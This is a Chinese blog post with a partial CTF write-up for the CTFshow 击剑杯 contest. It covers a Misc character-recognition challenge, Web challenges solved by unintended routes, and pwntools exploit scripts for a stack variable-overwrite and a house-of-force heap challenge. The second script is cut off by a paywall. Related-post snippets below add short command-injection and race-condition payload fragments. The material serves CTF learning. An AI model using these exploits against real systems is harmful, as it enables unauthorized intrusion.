CTFshow 击剑杯 部分WP

最新推荐文章于 2023-06-12 16:59:36 发布
最新推荐文章于 2023-06-12 16:59:36 发布
阅读量4.7k 收藏 4
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nancy523/article/details/121303789

摆烂了摆烂了 太难了
聪明的师傅已经组队打起月赛了
试试能不能苟住前5
苟住了 复现的后面再补充吧

文章目录

1.Misc

麻麻的 只会一题 其他的等复现再补充吧

中文识别带师

挺好玩一个题 格局打开
在这里插入图片描述
linux nc进环境(注意进来别用win的netcat连 不然你就会像下面那样 因为utf-8的环境会乱码)
在这里插入图片描述

在这里插入图片描述
连进去后 就认字 一炷香十个字还是蛮久的
我的解法是用手机或者电脑手写板 手写出字后百度百科查注音与笔画(这把的答案是带音调的 cv过去就行了)不过 积累与特征也能做)
出题师傅的自动解法的话参考官方wp 挺复杂的 所以再次格局打开

2.Web

简单的验证码

非预期解了 耳朵听验证码 手爆登录名密码 就出了

easyPOP

好像这题也是爆非预期了 yue天痛哭
不会 暴打队里的web爷做出来的
官解很详细 不想写

3.Pwn

pwn01-My_sword_is_ready

签到题 就最简单的变量覆盖
直接丢payload了

from pwn import *
p = remote("pwn.challenge.ctf.show", 28171)
payload = b'a'*36+p32(222)*3
p.recvuntil('Come and jj with bit!\n')
p.sendline(payload)
p.interactive()
pwn02-Precision_and_grace

house of force

payload:

from pwn import *
context.log_level = "debug"
p = remote('pwn.challenge.ctf.show', 28088)
elf = ELF("./pwn03-Precision_and_grace")
libc = ELF("/home/hackerbc/64bitbc-2.27.so") 
def create(size, content):
    p.sendlineafter(" :", "1")
    p.sendlineafter(" : ", str(size))
    p.sendlineafter(":", content)
def edit(idx, content):
    p.sendlineafter(" :", "2")
    p.sendlineafter(" :", str(idx))
    p.sendlineafter(" : ", content)
def show(idx):
    p.sendlineafter(" :", "3")
    p.sendlineafter(" :", str(idx))
def delete(idx):
    p.sendlineafter(" :", "4")
    p.sendlineafter(
最低0.47元/天 解锁文章

200万优质内容无限畅学
击剑器材“中国击剑协会认证标识”图例.pdf
07-30
从提供的文件内容中可以看出,文档主要围绕的是击剑器材的中国击剑协会认证标识图例展开,涉及了众多相关的企业信息和认证产品。具体知识点包括以下几个方面: 一、击剑器材的认证标识 认证标识是击剑器材产品经过...
击剑俱乐部网页模板
01-22
击剑俱乐部网页模板】是一种专门用于展示击剑俱乐部相关信息的网页设计模板,它通常包含一系列预设的页面布局、色彩搭配、图像元素以及交互设计,以帮助快速构建专业且吸引人的在线平台。该模板旨在突出击剑运动的...
CTFSHOW 击剑
qq_51584770的博客
11-18 867
给我看看 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); require_once("flag.php"); class whoami{ public $name; public $your_answer; public $useless; public function __construct(){ $this->name='ctfshow
[CTFSHOW]CTFSHOW击剑 部分WP
Sapphire037的博客
11-13 3425
进群得码 群里发送 击剑签到即可 所以就发送 “击剑签到即可” 然后得到flag 给我看看 三血 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); //require_once("flag.php"); class whoami{ public $name; public $your_answer; public $useless; public function
ctfshow JJ击剑WP 随便写写
mumuzi的博客
11-13 2660
????这几天不高兴 不想写。贴exp 中文识别带师 一个个识别 你和base击剑,谁更强? GIFFrame弄出来 然后扫码脚本 from PIL import Image, ImageSequence from pyzbar import pyzbar from tqdm import tqdm def decQR(img): infos = pyzbar.decode(img) return infos[0][0].decode() def get_QR(img): w,h
[ctfshow]击剑 web
记录学习,一起进步
06-12 1589
[ctfshow]击剑 web
CTFshow击剑osint——人家想玩嘛,人有点多超详细解法
Ztop的博客
11-14 1802
首先,在这里跟师傅们说一声抱歉,因为这次是自己第一次比较正式的出Osint题,可能有一些地方没有注意到,没有认真审核,给师傅们带来了麻烦,真的很抱歉!! 以下是人家想玩嘛、人有点多的详细解法及思路: 人家想玩嘛 百度识图,可以知道是土豪之邦——迪拜,也叫杜拜(Dubai) 根据图片,提取信息:大片类似人工湖的地方、左边凸出来的建筑、大批高建筑群。 谷歌地球查找迪拜,根据已知信息锁定地区 拉近距离,找到大致拍摄位置,大致为箭头根部位置 进入街景,多尝试几次,大概在中间一点的位置,找到拍摄位置 放大得到
ctfshow 击剑II
最新发布
06-22
很抱歉,我无法提供关于"ctfshow 击剑II"的具体信息,因为这不是一个广泛认知的活动或者技术术语。"CTF"通常是指 Capture the Flag(夺旗赛),这是一种网络安全竞赛,而"击剑"可能是一种比喻或某个特定领域的...
根据击剑运动员的动作预测击剑的结果数据集
01-23
此数据集由三部分组成,clipDescriptor、Keypoints文件夹和FencersKeyPoints文件夹。 clipDescriptor是数据集的入口点。每行包含下载原始视频的Video URL、开始和结束以检索剪辑该文件还包含有关击剑手如何击球的...
击剑web-给我看看
weixin_45931722的博客
11-17 390
反序列化的题 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); require_once("flag.php"); class whoami{ public $name; public $your_answer; public $useless; public function __construct(){ $this->name='ctfsho
CTFshow_萌新--密码篇
weixin_45908624的博客
02-02 1672
ctfshow_萌新 密码篇
ctfshow babyweb
weixin_45868644的博客
10-23 2550
文章目录一、baby_captcha 一、baby_captcha 点击首页的无脑给了一个500常用的密码字典 看来是要爆破密码了,而根据题目给出了的信息可以知道这个系统的账号是admin,只要把密码爆破出来就行了。 抓包进行爆破,payload用给的500常用密码 滴滴滴 拿到密码fire,然后练习下听力,根据放的声音写出来验证码 登录就有flag。 ...
CTFshow-菜狗WP
m0_61155226的博客
11-14 6679
然后得到了压缩包中的音频文件,然后发现文件后缀为.wav而不是原本的.mp3,猜测需要使用Silent eye工具 Sound qualit选择high,然后就得到flag啦。这里发现成功破除伪加密(也可以手动修改破伪加密),然后通过文件头判断压缩包中的文件类型为.pyc,并修改文件后缀名为.pyc(否则在线工具无法正常反编译;打开链接发现是看图识美女,要通过30关;访问链接发现是探姬的福利视频(bushi),然后根据提示的摩斯密码不难猜测到黑丝为1,白色为0,然后分割标志为视频的转场动画,
ctfshow 大牛web
羽的博客
05-03 9983
文章目录web_checkineasy_unserializeeasy_cms web_checkin 输入 ?code=?><?=`nl%09*` 得到源码 很明显是想让我们条件竞争。 生成文件 ?code=`nl%09/*>b` 开始竞争 import requests import threading import sys session=requests.session() url1="http://ba2bd9c4-6f58-45a1-a637-3cf0140e89c1.c
Ctfshow 五月赛 大牛 Web&BlockChain
feng的博客
05-03 1965
web_checkin ban了这些: acegikmoqsuwy13579 \+ _ \( & - # @ ~ \[ { \" \. , : 直接拿短标签和nl,反引号打: ?><?=`nl%09/*`
CTFshow_菜鸡_部分wp
monster663的博客
09-01 1306
web web签到 直接看到源码 <?php if(isset($_GET['url'])){ switch (strtolower(substr($_GET['url'], 0,4))) { case 'file': echo 'file protocol do not allow'; break; case 'php:': echo 'php protocol do not allow'
ctfshow渔人简单的二维码
fuyewan的博客
04-05 613
ctfshow渔人简单的二维码 就是一个找错误flag的题 将wp.docx改后缀改为zip解压出来,word文件夹进去就是一个flag文件,notepad++打开看到一个 word文件夹中_rels中的文件用notepad++打开搜索flag word中的media中有个lmage3.png,用010打开是个文本文件里面是 lmage2.png需要补出010开头和结尾才能打开就是这玩意 看wp中提示,用stegsolve打开到红色的0位看到一个二维码,扫描过后是 你说气不气。 想到lsb隐写
[DASCTF X GFCTF 2022十月挑战赛]EasyPOP
Yu3511606536的博客
10-29 1378
[DASCTF X GFCTF 2022十月挑战赛]EasyPOP
简单的验证码
weixin_43152468的博客
10-04 448
<?php //a-z 0-9 A-Z 进行密码包装 $ary = [0,1,2,3,4,5,6,7,8,9]; $a = [a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z]; $A = [A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z,]; $a1 = array_merge($ary,$a,$A); //将数组合并成一个好随机 $ay
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值